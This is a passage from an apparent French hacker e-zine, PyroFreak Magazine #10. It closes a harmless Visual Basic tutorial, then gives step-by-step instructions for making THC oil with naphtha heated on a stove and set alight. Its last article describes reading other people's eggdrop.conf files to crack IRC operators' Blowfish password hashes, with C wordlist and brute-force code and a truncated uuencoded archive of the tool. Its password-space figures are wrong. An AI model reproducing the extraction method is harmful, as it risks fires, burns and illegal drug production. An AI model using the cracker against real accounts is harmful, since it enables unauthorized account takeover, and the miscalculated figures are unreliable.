Elle comprend les commandes les plus courante:
¤ Enregistrer
¤ Ouvrir
¤ Ajouter une Feuille
¤ Executer
¤ Stop

Barre de Controle:

C'est ici que trouve tout les controles qui sont à votre
disposition, il vous suffit de cliquer sur le controle
désiré puis allé faire une séleciton sur la feuille de
travail. Vous pouvez également doublecliquer dessus.
sa en metera un au centre de la feuille.

Feuille de Travail:

C'est ici que l'on consoit le programme, les programmes
peuvent être composé d'une ou plusieur feuille.

Fenêtre de Propriété: (F4)

C'est ici que s'affiche les propriétés des objects sélectionnés.
Voici la définition des propriétés le splus souvant rencontré:

Name: Le nom de l'objet, chaque objet doit avoir un nom qui
lui est propre. c'Est avec celui-ci qu'on l'identifie.

Caption & Text: Le caption contien le texte que l'objet affichera.
Le caption ne peut être modifier à l'aide du
clavier lors de l'éxécu du programme,
contrairement au text

ToP: Cette valeur représente l'équart entre le haut de l'object
et sa limite supérieur (par raport a ce dans quoi il se
situe). Ex: un bouton dans une feuille, une feuille dans
l'écrant, un label dans un picturbox.

Left: Cette valeur représente l'équart entre le coté gauche
l'object et sa limite de de gauche.

Height: Cette Valeur représente la largeur vertical de l'objet

weight: Cette valeur représente la largeur horizontale de l'objet


Le Codage: (F7)
Pour entré du codage, vous devez double cliquer sur l'objet en question.


________
Notions: (End)
¯¯¯¯¯¯¯¯
La fonction END sert a terminer le programme.

____________
Exercice 1.1 (Fonction End)
¯¯¯¯¯¯¯¯¯¯¯¯
Nous Allons Maintenant réaliser notre premier programme:

- Ouvrez un nouveau projet Visual Basic

- Insérez un bouton sur la feuille

- Double-Cliquez sur le bouton pour en affiché le codage (F7)

- Vous verrez le codage suivant:

Private Sub Command1_Click()

End Sub

- Entre les 2 lignes, insérez la fonction END, comme ceci:

Private Sub Command1_Click()
End
End Sub

- Maintenant, fermez la fenêtre de codage et appuyez sur Play (F5).

Voici votre premier programme en Visual Basic. Si vous cliquez
sur le bouton , le programme se terminera, c'est l'utilité de la
fonction END.

________
Notions: (Propriétés)
¯¯¯¯¯¯¯¯
Lorsqu'on change une propriétée d'un objet avec du codage, on doit
toujour conserver la syntaxe suivante:

[Feuille.]objet.pripriété = Nouvelle Valeur

____________
Exercice 1.2 (Propriétés, textes et Caption)
¯¯¯¯¯¯¯¯¯¯¯¯
- Ouvrez un nouveau projet Visual Basic

- Cette vois, disposez y les objets suivant comme le
présente l'image exercice1_2.jpg :

Boutons: Name: Caption:
¯¯¯¯¯ ¯¯¯¯¯¯¯¯
Bo_Quit Quitter
Bo_Raz RAZ
Bo_Copy Copy

Ettiquettes: Names: Caption:
¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
Et_Destination 'Rien'

Zone de Texte: Names: Text:
¯¯¯¯¯¯ ¯¯¯¯¯
Zt_Enter 'Rien'


- Entrez, dans le bouton approprié, le codage suivant:

Private Sub Bo_Copy_Click()
Et_Destination.Caption = Zt_Enter.Text
End Sub

Private Sub Bo_Raz_Click()
Et_Destination.Caption = ""
Zt_Enter.Text = ""
End Sub

Private Sub Bo_Quit_Click()
End
End Sub


Executez le programme, vous remarquerez que le bouton RAZ efface
tout, il prend les opripriétés caption et text de l'étiquette et
de la Zone de Texte et leur donne les valeur "" (aucune, null)
donc, rien. Le bouton Copy lui, prend le texte que vous avez
saisit dans la Zone de Texte, et l'affiche dans l'étiquette. Il
prend la valeur de la pripriétés Text du Zt_Enter et l'applique
à la propriété Caption de Et_Destination. Le bouton Quitter lui,
fait la même chose qu'à l'exercice précédant.

________
Notions: (La Variable)
¯¯¯¯¯¯¯¯
Une variable est un endroit où l'on peut stoquer des information, elle est
idéale pour stoker des information temporairement, c'est un peut comme si
vous aviez une Étiquette Invisible.

____________
Exercice 1.3 (Propriétés, textes et Caption)
¯¯¯¯¯¯¯¯¯¯¯¯
- Prenez l'exercice N°2

- Faites Affiché la fenêtre de codage

- Allez completement en haut [(Generals), (Declaration)]

- Inscrivez y:

Dim Va_Copy

- Remplacez le codage de Bo_Copy ppar le suivant:

Private Sub Bo_Copy_Click()
Va_Copy = Zt_Enter.Text
Et_Destination.Caption = Va_Copy
End Sub

Le programme fait exactement la même chose qu'avant, mais il ne
fonctionne pas de la même fasson, Au lieu de mettre directement
la valeur de Zt_Enter.Text dans Et_Destination.Caption, il met
dabord la valeur dans la variable Va_Copy puis va chercher le
contenue de celle-ci dans Et_Destination.Caption.

________
Notions: (Modifier une Variable)
¯¯¯¯¯¯¯¯
Modifier une donnée en la fesant passé par une variable est beaucoup plus
simple que de la modifier directement.

Fonction Val(String): La fonction Val sert à transformé une valeur
en donné numérique.

Fonction Str(number): La fonction Str sert à transformé une valeur
en donné texte(String)

N.B. "123" est une donné string
123 quand à lui, est une donné numérique
on peut passé d'un a lautre à l'aide de Val et Str.

____________
Exercice 1.4 (Fonction Val, Modifier une variable)
¯¯¯¯¯¯¯¯¯¯¯¯
- Prenez l'exercice N°3

- Modifier le codage de Bo_Copy par:

Private Sub Bo_Copy_Click()
Va_Copy = Val(Zt_Enter.Text)
Va_Copy = Va_Copy + 5
Et_Destination.Caption = Va_Copy
End Sub

Maintenant, executez le programme(F5), Entrez un nombre dans
Zt_Enter et appuyez sur le bouton Copy. Vous remarquerez que
la valeur que vous avez entré dans Zt_Enter à été additionné
de 5 puis appliquer à Et_Destination.

________
Notions: (Calcules Mathématique)
¯¯¯¯¯¯¯¯
Vous pouvez faire une multitude de calcule mathématique avec Visual Basic.

Voici comment:

Pour faire: Codage:
¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯
5 + 2 5+2

5 - 2 5-2

5 ÷ 2 5/2

5 × 2 5*2

5² 5^2

5³ + 7²
------- (5^3+7^2)/5^2

___
V 9 9^(1/2)


____________
Exercice 1.5 (Calcule Mathématique)
¯¯¯¯¯¯¯¯¯¯¯¯
Dans cet exercice, nous allon prendre l'exercice N°4 et remplacé la
ligne « Va_Copy = Va_Copy + 5 » de Bo_Copy par les suivantes à tour
de rôle pour obtenir les résultats voulus.

- Variable + 4 Va_Copy = Va_Copy + 4
____
- V 25 - Variable Va_Copy = 25^(1/2) - Va_Copy

- 177 ÷ 33 + Variable + 2 Va_Copy = (177/33) + Va_Copy + 2

- 3² + 1 × Variable Va_Copy = 3^2+1 * Va_Copy

- Varioable à la puissance 19 Va_Copy = Va_Copy ^19

Exécutez le programme et entrez un chiffre dans Zt_Enter. Si vous
vérifiez avec une calculatrice, vous remarquerez que tout s'est bien
produit dans l'ordre.

____________
Exercice 1.6 (Création d'une calculatrice)
¯¯¯¯¯¯¯¯¯¯¯¯
- Affichez un nouveau projet VB à l'écran

- créez les objets suivant comme le présente l'image
exercice1_6.jpg :

Boutons: Name: Caption:
¯¯¯¯¯ ¯¯¯¯¯¯¯¯
Bo_Quit Quitter
Bo_Raz RAZ
Bo_Plus +
Bo_Moin -
Bo_Multi x
Bo_Divi /

Zone de Texte: Names: Text:
¯¯¯¯¯¯ ¯¯¯¯¯
Zt_Enter1 'Rien'
Zt_Enter2 'Rien'
Zt_Reponse 'Rien'

- Donnez le nom F_Main et le caption Calculatrice à votre feuille
de travail.

- Entrez la fonction End dans le Bo_Quit comme d'habitude.

- Entrez dans le Bo_Raz le codage suivant:

Private Sub Bo_Raz_Click()
Zt_Enter1.Text = ""
Zt_Enter2.Text = ""
Zt_Reponse.Caption = ""
End Sub

- Entrez dans le Bo_Plus le codage suivant:

Private Sub Bo_Plus_Click()
Va_Val1 = Val(Zt_Entrer1.Text)
Va_Val2 = Val(Zt_Entrer2.Text)
Et_Reponse.Caption = Va_Val1 + Va_Val2
End Sub

- Entrez dans le Bo_Moin le codage suivant:

Private Sub Bo_Moin_Click()
Va_Val1 = Val(Zt_Entrer1.Text)
Va_Val2 = Val(Zt_Entrer2.Text)
Et_Reponse.Caption = Va_Val1 - Va_Val2
End Sub

- Entrez dans le Bo_Multi le codage suivant:

Private Sub Bo_Multi_Click()
Va_Val1 = Val(Zt_Entrer1.Text)
Va_Val2 = Val(Zt_Entrer2.Text)
Et_Reponse.Caption = Va_Val1 * Va_Val2
End Sub

- Entrez dans le Bo_Divi le codage suivant:

Private Sub Bo_Divi_Click()
Va_Val1 = Val(Zt_Entrer1.Text)
Va_Val2 = Val(Zt_Entrer2.Text)
Et_Reponse.Caption = Va_Val1 / Va_Val2
End Sub

- Allez définir les Variables Va_Val1 et Va_Val2 à l'aide de la
commande DIM:

Dim Va_Val1, Va_Val2

Exécutez le programme puis entrez deux nombre dans chacun des textbox puis
cliquez sur le bouton représentant l'opération que vous voulez leur faire
effectués.

________
Notions: (MsgBox)
¯¯¯¯¯¯¯¯
Vous pouvez faire affiché un message à l'utilisateur par le biait de la
fonction MsgBox.

Voici la syntaxe de la fonction MsgBox:

MsgBox (Message [,Boutons] [,titre] [, Fichier d'aide, Numéro de Contexte] )

Message:
¯¯¯¯¯¯¯¯
Expression de Chaîne(String) affichée comme message dans la boîte de
dialogue. La longeur maximale de l'argument message est d'environ
1 024 caractères (1 Ko) selon la largeur des caractères utilisés.
Si l'argument message occupe plus d'une ligne, n'oubliez pas d'insérer
un retour de chariot (Chr(13)) ou un saut de ligne (Chr(10)) entre les
lignes, ou une combinaison de caractères retour chariot-saut de ligne
(Chr(13) & Chr(10)).

Boutons:
¯¯¯¯¯¯¯¯
Facultatif. Expression numérique qui représente la somme des valeurs
indiquand le nombre et le type de boutons à afficher, le style d'icône
à utiliser, l'identité du bouton par défaut, ainsi que la modalité du
message. Si l'argument bouton est omnis, sa baleur par défaut est 0.


Constante Valeur Desctiption
¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯
vbOKOnly 0 Affiche le bouton OK uniquement.
vbOKCancel 1 Affiche les boutons OK et Annuler.
vbAbordRetryIgnore 2 Affiche le bouton Abandoner, Réessayer et Ignorer
vbYesNoCancel 3 Affiche les boutons Oui, Non et Annuler
vbYesNo 4 Affiche les boutons Oui et Non
vbRetryCancel 5 Affiche les boutons Réessayer et Annuler
vbCritical 16 Affiche l'icône Message critique
vbQuestion 32 Affiche l'icône Requête d'avertissement
vbInformation 64 Affiche l'icône Message d'Avertissement
vbDefaultButton1 0 Le premier bouton est le bouton par défaut
vbDefaultButton2 256 Le deuxième bouton est le bouton par défaut
vbDefaultButton3 512 Le troisième bouton est le bouton par défaut
vbDefaultButton4 768 Le quatrième bouton est le bouton par défaut
vbApplicationModal 0 Boîte de dialogue modale. L'utilisateur doit
répondre au message affiché dans la zone de
message avant de pouvoir continuer de travailler
dans l'aplication en cours.
vbSystemModal 4096 Modal système. Toutes les applications sont
interrompues jusqu'à ce que l'utilisateur
réponde au message affiché dans la zone de
message.

Le premier groupe de valeurs (0 à 5) décrit le nombre et le type de boutons
affichés dans la boîte de dialogue. Le deuxième groupe (16, 32, 48 et 64)
décrit le style d'icône. Le troisième groupe (0, 256, 512 et 768) définit
le bouton par défaut. Enfin, le quatrième groupe (0 et 4096) détermine la
modalité de la zone de message. Au moment d'additionner ces nombres pour
obtenir la valeur finale de l'argument Bouton, ne sélectionnez qu'un seul
nombre dans chaque groupe.

Titre:
¯¯¯¯¯¯
Facultatif. Expression de chaîne affichée dans la barre de titre
de la boîte de dialogue. Si l'argument title est omnis, le nom de
l'application est placé dans la barre de titre.

Fichier d'aide:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Facultatif. Expression de Chaîne indiquand le fichier d'aide à utiliser
pour fournis une aide contextuelle sur la boîte de dialogue. Si l'argument
Fichier d'Aide est défini, l'argument Numéro de Contexte doit l'être également.


Numéro de Contexte:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Facultatif. Expression indiquand le numéro de contexte attribué par l'auteur
de l'aide à la rubrique appropriée. Si l'argument Numéro de Contexte est
défini, l'argument fichier d'aide doit l'être également.

Valeur Renvoyé:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Constante Valeur Boutton
¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯
vbOK 1 OK
vbCancel 2 Annuler
vbAbort 3 Abandonner
vbRetry 4 Réessayer
vbIgnore 5 Ignorer
vbYes 6 Oui
vbNo 7 Non



Si vous indiqurez à VB d'Affiché des boutons particulier, MsgBox retournera
un chiffre indiquand quel a été le bouton activé.

Dans ce cas, vous devez pécifier une destination au données, comme suis:

Dim X
X = MsgBox ("Voulez-vous poursuivre ?" , 4 , "Erreur..")

____________
Exercice 1.7 (MsgBox)
¯¯¯¯¯¯¯¯¯¯¯¯
- Affichez un nouveau projet VB à l'écran

- Placez un bouton que vous nommerez Bo_Msg au centre de la Feuille
et insérez y le codage suivant:

Private Sub Bo_Msg_Click()
MsgBox "Voici un Message-Box", "Pyrofreak Tutorial"
End Sub

Executez le programme et cliquez sur le bouton. Vous pouvez remarquer
que VB Affiche une petite fenêtre avec le message "Voici un Message-Box"
portant le titre "Pyrofreak Tutorial" et affichang le bouton OK.

____________
Exercice 1.8 (MsgBox)
¯¯¯¯¯¯¯¯¯¯¯¯
- Prenez l'exercice du N°7 et ajoutez-y les objects suivants:

Zone de Texte: Names: Text:
¯¯¯¯¯¯ ¯¯¯¯¯
Zt_msg 'Rien'
Zt_titre 'Rien'

- Changez le codage du bouton pour le suivant:

Private Sub Bo_Msg_Click()
MsgBox Zt_msg.Text, Zt_titre.Text
End Sub

Exécutez le programme, entrez du texte dans Zt_msg et Zt_Titre puis appuyez
sur le bouton. VB affichera le contenue de Zt_msg comme message et celui de
Zt_titre comme titre de la fenêtre. fait la même chose qu'à l'exercice précédant.

________
Notions: (Print)
¯¯¯¯¯¯¯¯
La fonction print, affiche du texte sur la feuille, sans Éttiquettes ou rien.
Elle rapporte a celle de Q-Basic qui servait a écrire du texte.

Syntaxe: Print Texte

________
Notions: (Cls)
¯¯¯¯¯¯¯¯
La fonction Cls sert a effacé le texte affiché à l'aide de la fonction Print.

syntaxe: Cls

____________
Exercice 1.8 (Print)

- Ouvrez un nouveau projet VB et placez y les object suivants:

Boutons: Name: Caption:
¯¯¯¯¯ ¯¯¯¯¯¯¯¯
Bo_Go Go
Bo_Raz RAZ
Bo_Quit Quitter

Ettiquettes: Names: Caption:
¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
Et_1 Titre
Et_2 Message
Et_1 Titre

Zone de Texte: Names: Text:
¯¯¯¯¯¯ ¯¯¯¯¯
Zt_msg 'Rien'
Zt_Titre 'Rien'

- Entrez dans chacun des bouton le codage suivants:

Private Sub Bo_Go_Click()
Dim X
X = MsgBox Zt_msg.Text, 4, Zt_titre.Text
cls
Print "No correspondant à la réponse: " & X
End Sub

Private Sub Bo_Raz_Click()
Cls
Zt_msg.text = ""
Zt_Titre.text = ""
End Sub

Private Sub Bo_Quit_Click()
End
End Sub

- Disposez le tout comme suggéré dans exercice1_8.jpg

Exécutez le programme puis Entrez une question et un Titre et appuyez sur GO.


Bon.. C'est tout pour la première partie.. je vous reviendrai dans le prochain
numéro de Pyrofreak avec une suite. D'ici la..
Bonne chance.. Mes P'ti MaDz Pr0Gr4MerZz!!


- Vip0|a


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 10-Fabrication d'huile de THC
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Neuro________ ________ neuro@pyrofreak.org ______ ___

Salut tous,
tout récemment, j'ai tester une méthode pour faire de l'huile,
qui à ma grandre surprise a été d'une "méga" simplicité et qui à été très
éfficace sur mon cerveau. C'est pourquoi j'ai décidé de vous la communiquer.

|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_- _
- -/_/_/- ^ ^ | ^ ^ -\_\_\- -
|


**Matériaux Nécessaires**

-Filtre à café
-Canne de conserve vide sans le papier a l'entour OU un chaudron, mais dite
vous que celui-ci ne sera plus bon par la suite.
(La Grosseurs dépend du nombre de grammes de marijuana que vous voulez
transformer en huile)
-Gaz à fondu (Naftam avec anti-rouille) (Gaz de couleur bleu qui se vend
dans toute les épiceries)
-Votre feuille ou trime de marijuana
-Un bol plus ou égal grandeur que la canne de conserve
-Un baton rond soit en bois ou en métal pour écraser et mélanger la marijuana
-Un rond de poil
-Un Ouvre boite
-Un Exacto de préférence ou sinon un couteau fera l'affaire


**Les mises en garde**

ATTENTION: Le gaz à fondu est explosif et très flammable, donc faîte très
attention, et essayer d'avoir une porte de sortie près de votre
rond de poil, pour en cas

  
de feu, pouvoir jeter votre mélange
en dehors de la maison. Un Extincteur a porter de la main serait
à vous conseiller. On ne sait jamais cé quoi qui peut arriver.

Je vous conseille aussi de faire cela dans un endroit bien aéré.
Je vous donne un exemple, c'est ma méthode, j'ouvre la fenêtre à
coter du poil, je laisse la porte entre-ouverte, pour que l'air
circule, et aussi pour quand qu'a de feu, je peuve l'ouvrir
facilement et rapidement, et j'ouvre la "fan" de mon poil pas
trop forte, de façon à bien entendre si le mélange vient à faire
de grosses bulles ou un sifflement.






**Les parties**

D'après mon expérience personnel, qui n'est pas encore dévellopé au
maximum, il faut 1 bouteille de 500 ml de gaz à fondu pour 85 grammes
de feuille ou de trime de marijuana. Mais je vais vous donner un truc très
simple pour savoir comment qui vous faut de gaz selon la feuille que vous
avez. Mettez votre feuille dans votre bol, et verser du gaz, jusqu'a temps
que la marijuana soit recouverte au complet. Aussi simple que cela.


**Extraire le THC**

Après avoir mélangé votre pot et le gaz dans le bol, vous prenez votre baton
et vous brasser le mélange, le remuer, l'écraser, le tourner. Le liquide
va virer à une couleur verdâtre bien assez vite. Ensuite laisser reposer le
mélange durant quelques heures (6-8), le temps que le THC s'extrait bien
de la marijuana. 6 heures est un minimum, vous pouvez le laisser beau-
coup plus longtemps pour une meilleur efficicacité.


**Filtrage**

Vous mettez votre filtre à café par dessus votre canne de conserve, vous
verser votre solution, qui devrais etre d'un vert très foncé, si vous avez
pas trop mis de gaz. Quand le liquide à fini de couler, verser maintenant
la marijuana aussi dans le filtre, et excerser une pression sur le filtre
avec vos mains, pour bien extraire le plus possible le THC du pot. Ensuite
jeter la marijuana, elle est rendu infumable, bref cela est mon avis, mais
si ca vous dis de fumer de la marijuana explosif qui buzz pas, faite cela
à votre tête. Laver vous bien les mains par la suite, le gaz rentre dans
peau.


**Cuisson**

Metter votre canne de conserve sur le rond, et faite chauffer celui-ci au
minimum (Entre le récheau et le niveau 2, (cela est basé d'apres mon poil
et une petite quantité de feuilles)). Tester le vous même vous allez savoir
à quel température faut ajuster votre rond. Faut que le mélange fasse de tres
petites bulles, sans faire de sifflement.

ATTENTION: Si le mélange fais de grosses bulles, ou/et un sifflement très
intense, baisser la chaleur de votre rond immédiatement.



Bon, maintenant que quasi tout le gaz à fondu soit évaporer, ils vous reste
2 étapes avant l'étape ultime qui est de tester votre "Stock". Si vous avez
pris une canne de conserve, j'ai un truc pour vous, qui va vous faire économiser
du temps, et aussi beaucoup de patience. Couper le fond de la canne en question
avec un ouvre boite. 90% de votre huile se retrouve justement sur ce fond de
canne. Ensuite avec un exacto, il ne reste plus qu'a gratter le fond de la
canne le plus possible, et déposer au fur à mesure l'huile sur une surface
plate et lisse.

Par la suite, reprener petit par petit votre huile (A coup de .3 gram environ),
avec votre exacto, de facon a faire seulement une boule. Vous prener un lighter
et vous allumer votre bite. Une flamme d'environ 5 secondes va se produire
quand vous allumiez votre produit, et l'huile va retomber de lexacto par
elle meme. Cé pour éliminer le plus possible le restant de gaz restant dans
l'huile. Si l'huile devient toute sec après cet opération, c'est peut-être
à cause qui reste encore trop de gaz dans votre huile.

Bon, et maintenant avec l'huile obtenu, vous pouvez tripper au max, et cela
ne vous aura pas couter trop cher. Si vous voyez quel goûte encore trop le
gaz a fondu, recommencer la dernière opération.



**Moyen pour peser votre huile**

Beaucoup de monde trouvent que peser l'huile peut s'avérer d'une difficulté
extreme, heh bien, j'ai la solution à votre problème. Prener votre balance
habituelle, peser-y un bouchon de biere, et inscriver bien son poid. Ensuite
vider directement l'huile dans le bouchon de biere et cela sur la balance.
Avec cela vous pouvez savoir exactement quand vous aller avoir atteint la
quantité désiré, sans faire de dégat, et je trouve ca pratique dans un
bouchon de bière.


Nb de Neuro: Une version de cet article plus détaillé est prévu dans les
prochaines semaines, elle sera disponible sur le site web
de PyroFreak (Www.PyroFreak.Org) dans les textes Onlines.

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|11-Les secrets d'Eggdrop enfin dévoilés
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___



Eggdrop est un programme très populaire sur le net. Il permet de
configurer un bot sur un serveur unix. Le bot doit faire l'authentification
de chaque OP du channel pour les oper. Il doit donc mémoriser chaque
utilisateurs et leur password correspondant. L'ensemble de cette information
est enregistrée dans son fichier de configuration: eggdrop.conf. Ce fichier
est accessible sur le serveur qui runne le eggdrop. Qui n'a jamais vu sur un
quelconque serveur unix un eggdrop en activité?. Si l'on arrive à lire son
fichier de configuration, nous pourrions décrypter les password et avoir du
plaisir sur leur channel irc.


Exemple de eggdrop.conf:

[..]
Franck - -
! #pyrofreak 0 fmnov
--HOSTS *!lemarquis@*.sprint.ca
--PASS +kxW5Q0AvijV1
--XTRA created 936417875
--COMMENT user très cool
[...]


Nous avons ici le hostname mask du user. Nous devons l'avoir pour que le bot
nous accepte. Ensuite on retrouve le password encrypter "+kxW5Q0AvijV1". Ce
password est encrypter en blowfish. Tout comme le DES nous ne pouvons pas
reverser l'encryption et obtenir le password en refaisant l'algorithme à
l'envers. Mais nous pouvons a l'image de john de ripper, faire un programme
qui à l'aide d'une liste de mots (wordlist) encrypterait chaque mots et les
comparerait avec le password encrypter que nous tentons de découvrir. Ce type
de décryption est pratique pour les passwords simples. Par contre, la tâche
est longue et ardue pour des password de fortes complexités. Comme le
cracking du DES, ce type d'attaque requière beaucoup de cpu power.


Le blowfish utilisé dans eggdrop a un grosseur de key d'encryption pouvant
aller jusqu'à 448 bits. Ce type d'encryption est sans copyright et est perçu
comme secure. Son prédécesseur le DES qui a une key de 56-bit que l'on sait
très vulnérable à la brute force. Avec des hardware spéciaux la NSA serait
probablement capable de faire le tour de toutes les possibilités de password
en 3 heures. Le brute force cracking du Blowfish demande donc beaucoup
plus de temps et de cpu power que le DES.

Dernièrement, j'ai vu dans les nouveautés de sécurité un programme de
Hydrogen et X Organisation qui était un rip du code blowfish de eggdrop qui
encryptait chaque mots d'une liste. Nous devions faire un grep avec le
password que l'on voulait deviner sur la wordlist encryptée. J'ai tout de
suite imaginer le potentiel de ce programme encore embryonnaire et peu
rapide. Avec les procédures d'encryption de leur programme j'ai tenté de
créer un programme semblable a John the Ripper. J'ai ainsi incorporer une
brute force attaque ne requérant aucun wordlist.

Code principal:
[..]
if(mode==1){ /* wordlist cracking */
if(inputfile==0) help(argv[0]);
dict = (argc > 1) ? fopen(inputfile, "r") : stdin;
printf("Guessing %s with wordlist %s\n\n",check,inputfile);
while(!feof(dict)){ /* pour chaque word de la wordlist..*/
fscanf(dict, "%s", plain);
blowfish_encrypt_pass(plain, crypted, 0); /* encrypter le word */
if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check);
i++;
if(!strcmp(crypted,check)) result; /* vérification si c'est le bon pass */
memset(&crypted, 0, sizeof(crypted));}
printf("done. tryed %d guess\n", i);}
if(mode==2){ /* brute force cracking */
[..]
printf ("5 Characters Long..\n");
plain[5] = '\0';
for (i = nb1; i < nb2; i++){ /* pour chaque lettre j'incremine
dans le ANSI */

for (j = nb1; j < nb2; j++){
for (k = nb1; k < nb2; k++){
for (l = nb1; l < nb2; l++){
for (m = nb1; m < nb2; m++){
plain[0] = i; plain[1] = j; plain[2] = k; plain[3] = l;
plain[4] = m;
blowfish_encrypt_pass(plain, crypted, 0);
if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check);
if(!strcmp(crypted,check)) result;}}}}}


Les variable nb1 et nb2 représentent l'étendu du ANSI dans lequel nous
créeons nos mots. Pour nb1=33 et nb2=126, nous essayerons toute les
possibilité de mots comprenant tous les caractère possible (^*&!%AsDsa231).
Pour un password de 5 caractères cela nous fait 5^57 (nb2-nb1=57) possibilité
de password. Faire l'ensemble de ces password et les comparer au password à
trouver serait terriblement long. C'est pourquoi, j'ai mis 4 types de brute
force sur mon programme. Avec le mode numérique nous pouvons facilement
deviner un password composer uniquement de chiffre. Avec 4 caractère nous
avons 5^9 possibilités de password, nous venons d'économiser
des heures de cracking.


nb1=65 ---> nb2=122 : caractère alphabétique (A-Z,a-z)
nb1=48 ---> nb2=57 : caractère numérique (0-9)
nb1=48 ---> nb2=122 : caractère alphanumérique (A-Z,a-z,0-9)
nb1=33 ---> nb2=126 : toute les possibilités de caractère (^*&!%AsDsa231)


Lorsque que l'on interrompt notre session de cracking, le programme nous
donne les chiffres représentants où le cracking s'est rendu. Ce sont les
variables i,j,k,l,m,n. Elles représentent chaque caractères du dernier
password testé. Plus le chiffre est haut, plus notre cracking était avancé.
Le chiffre ne représente pas directement le nombre d'essai car une attaque du
ANSI 48 au 57 ne donnera que des valeur entre 48 et 57.


Exemple:
Dernier password testé: 1338
Stoped at: 0 0 0 48 51 51 49

o --> caractère 7 = 0
n --> caractère 6 = 0
m --> caractère 5 = 0
l --> caractère 4 = 48 ==> 1
k --> caractère 3 = 51 ==> 3
j --> caractère 2 = 51 ==> 3
i --> caractère 1 = 49 ==> 8


Avec c'est 7 valeurs nous pourrions résumer notre ancienne session de
crack. Il nous s'agirait de mettre ces valeurs dans un fichier ( restore pour
john the ripper ) quand nous arrêtons le crackage. Une option de restauration
pourrait permettre de lire ce fichier et de repartir le cracking avec ces
valeurs. Je n'ai pas incorporé cette option dans mon présent programme.
Toutefois quelqu'un avec un peu de connaissance en C pourrait mettre les
valeurs de son ancienne session au variable du le code. En recompilant le
programme, il commencera sa brute force avec les nouvelles valeurs. Ce
programme est la preuve que n'importe quel type d'encryption aussi secure
qu'il prétend être ne pourra être battu par une attaque bien conçu. " La
connaissance est le pouvoir "
, je ne peux m'empêcher d'ajouter que " le
coding est le pouvoir absolu "
.



begin 644 eggcrack.tgz
M'XL(`-PN-C@``^U\:Y<4Q[6EOZI_11J/I&[1H'A')FUT%Y*0S#4&C9#&\I4Q
M$T^ZH+JJ;W6U`,UB?OOLB!-150T-LN^R)-]9U+)%=68\SV.??4YDI9\OG^79
MV?'UX]_\;!_.F%%J^,TP<*M9^7?@]'?]",75,!AKC>926X.[N,U^,["?;TG;
MS_G9VJV&X3=^N7C\]G9I=?9++.B7_7S\T7"RC+,\2W'@TY/S^60&_V)8+7UZ
M,5R[-F#;9X,[7R_#<I&'']S\''\OEL^&CS[>^]TL+V+*PZ,_//KT[OT_?W'G
MP1_V?H<+LT6Z<`T-%V%^'M/P^[-UG,_\]>-/=JZ=+V:X?/':>G:2ZI4VW)]N
M???'VW_Y]"
_?W'XP:#-L/EB^4N/@9^NSNJ+6W.=']X;=#S>;>XOE[=5J]Q[;
MW/K\UC>W;G_]]?VO-_>N\<W-S?S],^YM[GU;[CQB8UW'<+XXFSU>0*#AV*VV
M;?Y\_^O/'W'S2INSX^5JO1UI<>+F\V78?WXP+!ZU[_CC\-&C+^[<O?WH$;[<
MO7,/7P[V]K#Y>.O!,+]]^YOEL+KSU9"_OG\RI,>/XVIY>OVX"*2T^>+;S_XX
M?/.'V\.M;[^Y_]G]>U\,-SZO]_J<#^[\Q^W[7SRZ<^^;0;UZ\>[]>U_B:M%A
MWFEX\R9:#L.%K4GQRM9FB_7>[]+\+)6FV^YER+^K_QPN65JE!0P4(]5_RH["
M\7)YE@8'2UVG8;F*:37DY6IXL3Q?#9!Y?.96B;8XR\5"
R_@/'GUZY\O;]SZ_
M<^M>&>/6IY]]/ER#Y3RNX[L%_CA9KI>KY=R5KK#*Y6)PSS#Z\'_VAHMK+%>/
MRL5=O=?%?*\>EAMGZ]5Y6->.%P526[$;X]'E=_@;[X@WWI%TY^7P[&COY5&3
M4W6-5[;=);)X@T@^_^S36Y#"?+9>S]-6*I@GS7]ND<C_PL;?+"SV1I'\]E*9
MD&G]VEC\:WS^Y)["!^?IYYSC)^+_H(0>!LNX-%)J4^,_T_I=_/\E/I]]]M[-
MX7$(>Y]]<??6EP_PQ[7[8KCV>._NYN_YWOU/__WV9]\\&&X.OM/%Y=X>@M.-
MS842=L+*A:=[>_W2]N;UL/UZ7(+SVH$#[+WW/_8_^^Q@P'_K7`?#M9UV82_,
MDUO<V'OOVNIDN):'C_XO6K:5'.Q,U[_=V%S#=-N6E\RRW+1\0Y=?6RF_X*<K
MX^><X^W^+[DQ[%7^S\P[__]%/@B)W01N#)]V9_[JFE\^']PB#@_J-]R?I[-7
M./\WMSY]].D7NXR_7=F#2->S<)$?S!:S-6;ZZOO*S:\.XB'@I)`!]EPHF8T;
MQT-\'[63;(RR?.>23Z,3J7QGTC(KE3JL/9QBDQR%*'?$-&7)(ZNM1I&RF^I(
M*:ADPCA1#Z7%*'@RY8X<(X*-M>6[3UH9$W*]KM+$@@G4(S`7Q.1KJS#9H%F,
MM54>5=1>U]Y:639Q2STFP4W4<:K[F.R4/?>'A7^\11X/P(Z^%]IT:9!$(K;.
MO*NKG<:8O7:A[C7G:$7TY3OVX'"
GS>W'Q%U.=87&"6/35'M[9\/$5%UMYB+8
M/#6)"
.7X-"F2@IPXA&!)AHQGD01I8TPY<$,]C#238+%*UW)M(=^Z5Z?TF).K
M.LMJDC+:1#U8G-!LK-*U8DS>Z-9[]"
'2=ZA%*Y=:#PN1.L7K/H+03D\DZ2E(
